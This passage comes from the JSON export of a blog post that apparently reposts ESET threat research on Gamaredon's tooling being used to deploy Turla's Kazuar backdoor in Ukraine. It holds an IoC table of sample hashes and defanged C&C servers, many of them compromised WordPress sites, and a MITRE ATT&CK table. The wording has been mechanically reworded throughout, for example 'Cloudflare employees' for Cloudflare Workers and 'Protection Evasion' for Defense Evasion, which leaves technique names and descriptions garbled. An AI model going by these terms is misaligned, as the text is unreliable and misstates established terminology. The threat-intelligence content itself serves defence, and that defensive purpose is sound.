href=\"https:\/\/www.welivesecurity.com\/en\/eset-research\/gamaredon-x-turla-collab\/mailto:threatintel@eset.com?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=autotagging&amp;utm_content=eset-research&amp;utm_term=en\">threatintel@eset.com<\/a>.\u00a0<\/em><\/div>\n<div><em>ESET Analysis presents non-public APT intelligence reviews and knowledge feeds. For any inquiries about this service, go to the <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=gamaredon-x-turla-collab&amp;sfdccampaignid=7011n0000017htTAAQ\" target=\"_blank\" rel=\"noopener\">ESET Risk Intelligence<\/a> web page.<\/em><\/div>\n<\/blockquote>\n<h2>IoCs<\/h2>\n<p>A complete checklist of indicators of compromise (IoCs) and samples may be present in our <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/github.com\/eset\/malware-ioc\/tree\/master\/turla\">GitHub repository<\/a>.<\/p>\n<h3>Information<\/h3>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"179\"><strong>SHA-1<\/strong><\/td>\n<td width=\"123\"><strong>Filename<\/strong><\/td>\n<td width=\"180\"><strong>Detection<\/strong><\/td>\n<td width=\"161\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">7DB790F75829D3E6207D<wbr\/>8EC1CBCD3C133F596D67<\/span><\/td>\n<td width=\"123\">N\/A<\/td>\n<td width=\"180\">PowerShell\/Pterodo.QB<\/td>\n<td width=\"161\">PteroOdd.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">2610A899FE73B8F018D1<wbr\/>9B50BE55D66A6C78B2AF<\/span><\/td>\n<td width=\"123\">N\/A<\/td>\n<td width=\"180\">PowerShell\/Pterodo.QB<\/td>\n<td width=\"161\">PteroOdd.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">3A24520566BBE2E262A2<wbr\/>911E38FD8130469BA830<\/span><\/td>\n<td width=\"123\">N\/A<\/td>\n<td width=\"180\">PowerShell\/Pterodo.QB<\/td>\n<td width=\"161\">PteroOdd.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">DA7D5B9AB578EF648747<wbr\/>3180B975A4B2701FDA9E<\/span><\/td>\n<td width=\"123\"><span style=\"font-family: courier new, courier, monospace;\">scrss.ps1<\/span><\/td>\n<td width=\"180\">PowerShell\/Turla.AI<\/td>\n<td width=\"161\">Kazuar v2 installer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">D7DF1325F66E029F4B77<wbr\/>E211A238AA060D7217ED<\/span><\/td>\n<td width=\"123\">N\/A<\/td>\n<td width=\"180\">MSIL\/Turla.N.gen<\/td>\n<td width=\"161\">Kazuar v2.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">FF741330CC8D9624D791<wbr\/>DE9074086BBFB0E257DC<\/span><\/td>\n<td width=\"123\">N\/A<\/td>\n<td width=\"180\">PowerShell\/TrojanDo<wbr\/>wnloader.Agent.DV<\/td>\n<td width=\"161\">PowerShell downloader executed by PteroPaste.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">A7ACEE41D66B537D9004<wbr\/>03F0E6A26AB6A1290A32<\/span><\/td>\n<td width=\"123\"><span style=\"font-family: courier new, courier, monospace;\">ekrn.ps1<\/span><\/td>\n<td width=\"180\">PowerShell\/Turla.AJ<\/td>\n<td width=\"161\">Kazuar v2 installer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">54F2245E0D3ADEC566E4<wbr\/>D822274623BF835E170C<\/span><\/td>\n<td width=\"123\">N\/A<\/td>\n<td width=\"180\">MSIL\/Agent_AGen.CZQ<\/td>\n<td width=\"161\">Kazuar v2.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">371AB9EB2A3DA44099B2<wbr\/>B7716DE0916600450CFD<\/span><\/td>\n<td width=\"123\"><span style=\"font-family: courier new, courier, monospace;\">ekrn.ps1<\/span><\/td>\n<td width=\"180\">PowerShell\/Turla.AJ<\/td>\n<td width=\"161\">Kazuar v2 installer.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">4A58365EB8F928EC3CD6<wbr\/>2FF59E59645C2D8C0BA5<\/span><\/td>\n<td width=\"123\">N\/A<\/td>\n<td width=\"180\">MSIL\/Turla.W<\/td>\n<td width=\"161\">Kazuar v2.<\/td>\n<\/tr>\n<tr>\n<td width=\"179\"><span style=\"font-family: courier new, courier, monospace;\">214DC22FA25314F9C0DD<wbr\/>A54F669EDE72000C85A4<\/span><\/td>\n<td width=\"123\"><span style=\"font-family: courier new, courier, monospace;\">Sandboxie.vbs<\/span><\/td>\n<td width=\"180\">VBS\/Turla.C<\/td>\n<td width=\"161\">Kazuar v2 installer \u2013 VBScript variant.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h3>Community<\/h3>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"147\"><strong>IP<\/strong><\/td>\n<td width=\"136\"><strong>Area<\/strong><\/td>\n<td width=\"113\"><strong>Internet hosting supplier<\/strong><\/td>\n<td width=\"85\"><strong>First seen<\/strong><\/td>\n<td width=\"161\"><strong>Particulars<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td width=\"147\">N\/A<\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">lucky-king-96d6.mop<wbr\/>ig92456.employees[.]dev<\/span><\/td>\n<td width=\"113\">N\/A<\/td>\n<td width=\"85\">2025\u201102\u201128<\/td>\n<td width=\"161\">Cloudflare employee present in payloads downloaded by PteroOdd.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">64.176.173[.]164<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">eset.ydns[.]eu<\/span><\/td>\n<td width=\"113\">The Fixed Firm, LLC<\/td>\n<td width=\"85\">2025\u201103\u201101<\/td>\n<td width=\"161\">C&amp;C server present in payloads downloaded by PteroOdd.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">85.13.145[.]231<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">hauptschule-schw<wbr\/>albenstrasse[.]de<\/span><\/td>\n<td width=\"113\">Neue Medien Muennich GmbH<\/td>\n<td width=\"85\">2024\u201106\u201106<\/td>\n<td width=\"161\">Compromised WordPress website used as Kazuar C&amp;C.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">91.231.182[.]187<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">ekrn.ydns[.]eu<\/span><\/td>\n<td width=\"113\">South Park Networks LLC<\/td>\n<td width=\"85\">2025\u201106\u201105<\/td>\n<td width=\"161\">C&amp;C server in payloads downloaded by PteroPaste.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">185.118.115[.]15<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">fjsconsultoria[.]com<\/span><\/td>\n<td width=\"113\">Dream Fusion &#8211; IT Companies, Lda<\/td>\n<td width=\"85\">2024\u201106\u201126<\/td>\n<td width=\"161\">Compromised WordPress website used as Kazuar C&amp;C.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">77.46.148[.]242<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">ingas[.]rs<\/span><\/td>\n<td width=\"113\">TELEKOM SRBIJA a.d.<\/td>\n<td width=\"85\">2024\u201106\u201103<\/td>\n<td width=\"161\">Compromised WordPress website used as Kazuar C&amp;C.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">168.119.152[.]19<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">abrargeospatial[.]ir<\/span><\/td>\n<td width=\"113\">Hetzner On-line GmbH<\/td>\n<td width=\"85\">2023\u201111\u201113<\/td>\n<td width=\"161\">Compromised WordPress website used as Kazuar C&amp;C.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">217.160.0[.]33<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">www.brannenburg<wbr\/>er-nagelfluh[.]de<\/span><\/td>\n<td width=\"113\">IONOS SE<\/td>\n<td width=\"85\">2019\u201106\u201106<\/td>\n<td width=\"161\">Compromised WordPress website used as Kazuar C&amp;C.<\/td>\n<\/tr>\n<tr>\n<td width=\"147\"><span style=\"font-family: courier new, courier, monospace;\">217.160.0[.]159<\/span><\/td>\n<td width=\"136\"><span style=\"font-family: courier new, courier, monospace;\">www.pizzeria-mercy[.]de<\/span><\/td>\n<td width=\"113\">IONOS SE<\/td>\n<td width=\"85\">2023\u201110\u201105<\/td>\n<td width=\"161\">Compromised WordPress website used as Kazuar C&amp;C.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<h2>MITRE ATT&amp;CK strategies<\/h2>\n<p>This desk was constructed utilizing <a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/resources\/versions\/\">model 17<\/a> of the MITRE ATT&amp;CK framework<strong>.<\/strong><\/p>\n<table border=\"1\" width=\"642\" cellspacing=\"0\" cellpadding=\"0\">\n<thead>\n<tr>\n<td width=\"113\"><strong>Tactic<\/strong><\/td>\n<td width=\"113\"><strong>ID<\/strong><\/td>\n<td width=\"151\"><strong>Identify<\/strong><\/td>\n<td width=\"265\"><strong>Description<\/strong><\/td>\n<\/tr>\n<\/thead>\n<tbody>\n<tr>\n<td rowspan=\"5\" width=\"113\"><strong>Useful resource Growth<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1583\/001\" target=\"_blank\" rel=\"noopener\">T1583.001<\/a><\/td>\n<td width=\"151\">Purchase Infrastructure: Domains<\/td>\n<td width=\"265\">Gamaredon or Turla registered a website at a free dynamic DNS supplier.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1583\/004\" target=\"_blank\" rel=\"noopener\">T1583.004<\/a><\/td>\n<td width=\"151\">Purchase Infrastructure: Server<\/td>\n<td width=\"265\">Gamaredon or Turla rented a server at Vultr.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1583\/007\" target=\"_blank\" rel=\"noopener\">T1583.007<\/a><\/td>\n<td width=\"151\">Purchase Infrastructure: Serverless<\/td>\n<td width=\"265\">Gamaredon created Cloudflare employees and Telegra.ph pages.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1584\/003\" target=\"_blank\" rel=\"noopener\">T1584.003<\/a><\/td>\n<td width=\"151\">Compromise Infrastructure: Digital Non-public Server<\/td>\n<td width=\"265\">Turla compromised WordPress web sites.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1608\/\" target=\"_blank\" rel=\"noopener\">T1608<\/a><\/td>\n<td width=\"151\">Stage Capabilities<\/td>\n<td width=\"265\">Turla staged Kazuar installer scripts on its C&amp;C servers.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><strong>Execution<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1059\/001\" target=\"_blank\" rel=\"noopener\">T1059.001<\/a><\/td>\n<td width=\"151\">Command and Scripting Interpreter: PowerShell<\/td>\n<td width=\"265\">PteroGraphin is developed in PowerShell.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><strong>Persistence<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1574\/002\" target=\"_blank\" rel=\"noopener\">T1574.002<\/a><\/td>\n<td width=\"151\">Hijack Execution Circulate: DLL Aspect-Loading<\/td>\n<td width=\"265\">Kazuar loaders use DLL side-loading.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"3\" width=\"113\"><strong>Protection Evasion<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1140\" target=\"_blank\" rel=\"noopener\">T1140<\/a><\/td>\n<td width=\"151\">Deobfuscate\/Decode Information or Info<\/td>\n<td width=\"265\">The Kazuar payload is XOR encrypted and all Kazuar strings are encrypted by way of substitution tables.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1480\/001\" target=\"_blank\" rel=\"noopener\">T1480.001<\/a><\/td>\n<td width=\"151\">Execution Guardrails: Environmental Keying<\/td>\n<td width=\"265\">Kazuar loaders decrypt the payloads, utilizing the machine title as the important thing.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1036\/005\" target=\"_blank\" rel=\"noopener\">T1036.005<\/a><\/td>\n<td width=\"151\">Masquerading: Match Reputable Identify or Location<\/td>\n<td width=\"265\">Kazuar loaders are situated in legitimate-looking directories equivalent to <span style=\"font-family: courier new, courier, monospace;\">C:Program Information (x86)Brother PrinterApp<\/span> or <span style=\"font-family: courier new, courier, monospace;\">%LOCALAPPDATApercentProgramsSonyAudio<wbr\/>Drivers<\/span>.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"4\" width=\"113\"><strong>Discovery<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1057\/\" target=\"_blank\" rel=\"noopener\">T1057<\/a><\/td>\n<td width=\"151\">Course of Discovery<\/td>\n<td width=\"265\">The PowerShell script beginning Kazuar v3 sends the checklist of operating processes to its C&amp;C server.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1012\/\" target=\"_blank\" rel=\"noopener\">T1012<\/a><\/td>\n<td width=\"151\">Question Registry<\/td>\n<td width=\"265\">The PowerShell script beginning Kazuar v3 will get the PowerShell model from the registry.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1082\/\" target=\"_blank\" rel=\"noopener\">T1082<\/a><\/td>\n<td width=\"151\">System Info Discovery<\/td>\n<td width=\"265\">The PowerShell script beginning Kazuar v3 exfiltrates the final boot time, OS model, and OS structure.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1083\/\" target=\"_blank\" rel=\"noopener\">T1083<\/a><\/td>\n<td width=\"151\">File and Listing Discovery<\/td>\n<td width=\"265\">The PowerShell script beginning Kazuar v3 lists recordsdata within the directories <span style=\"font-family: courier new, courier, monospace;\">%TEMP%<\/span> and <span style=\"font-family: courier new, courier, monospace;\">%APPDATApercentMicrosoftWindows<\/span>.<\/td>\n<\/tr>\n<tr>\n<td rowspan=\"3\" width=\"113\"><strong>Command and Management<\/strong><\/td>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1071\/001\" target=\"_blank\" rel=\"noopener\">T1071.001<\/a><\/td>\n<td width=\"151\">Utility Layer Protocol: Net Protocols<\/td>\n<td width=\"265\">PteroGraphin and Kazuar use HTTPS.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1573\/001\" target=\"_blank\" rel=\"noopener\">T1573.001<\/a><\/td>\n<td width=\"151\">Encrypted Channel: Symmetric Cryptography<\/td>\n<td width=\"265\">PteroGraphin decrypts the C&amp;C reply utilizing 3DES.<\/td>\n<\/tr>\n<tr>\n<td width=\"113\"><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/attack.mitre.org\/versions\/v17\/techniques\/T1102\/\" target=\"_blank\" rel=\"noopener\">T1102<\/a><\/td>\n<td width=\"151\">Net Service<\/td>\n<td width=\"265\">Reputable internet companies, equivalent to Telegra.ph, had been used on this marketing campaign.<\/td>\n<\/tr>\n<\/tbody>\n<\/table>\n<p><a rel=\"nofollow\" target=\"_blank\" href=\"https:\/\/www.eset.com\/int\/business\/services\/threat-intelligence\/?utm_source=welivesecurity.com&amp;utm_medium=referral&amp;utm_campaign=wls-research&amp;utm_content=gamaredon-x-turla-collab&amp;sfdccampaignid=7011n0000017htTAAQ\" target=\"_blank\" rel=\"noopener\"><img loading=\"lazy\" decoding=\"async\" src=\"https:\/\/web-assets.esetstatic.com\/wls\/eti-eset-threat-intelligence.png\" alt=\"\" width=\"915\" height=\"296\"\/><\/a><\/p>\n<\/div>\n\n","protected":false},"excerpt":{"rendered":"<p>On this blogpost, we uncover the primary recognized circumstances of collaboration between Gamaredon and Turla, in Ukraine. Key factors of this blogpost: In February 2025, we found that the Gamaredon device PteroGraphin was used to restart Turla\u2019s Kazuar backdoor on a machine in Ukraine. In April and June 2025, we detected that Kazuar v2 was [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":6919,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[58],"tags":[3519,553,5485],"class_list":["post-6917","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-cybersecurity","tag-collab","tag-gamaredon","tag-turla"],"_links":{"self":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/6917","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=6917"}],"version-history":[{"count":1,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/6917\/revisions"}],"predecessor-version":[{"id":6918,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/posts\/6917\/revisions\/6918"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=\/wp\/v2\/media\/6919"}],"wp:attachment":[{"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=6917"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=6917"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/techtrendfeed.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=6917"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}<!-- This website is optimized by Airlift. Learn more: https://airlift.net. Template:. Learn more: https://airlift.net. Template: 69d9690a190636c2e0989534. Config Timestamp: 2026-04-10 21:18:02 UTC, Cached Timestamp: 2026-05-14 22:13:28 UTC -->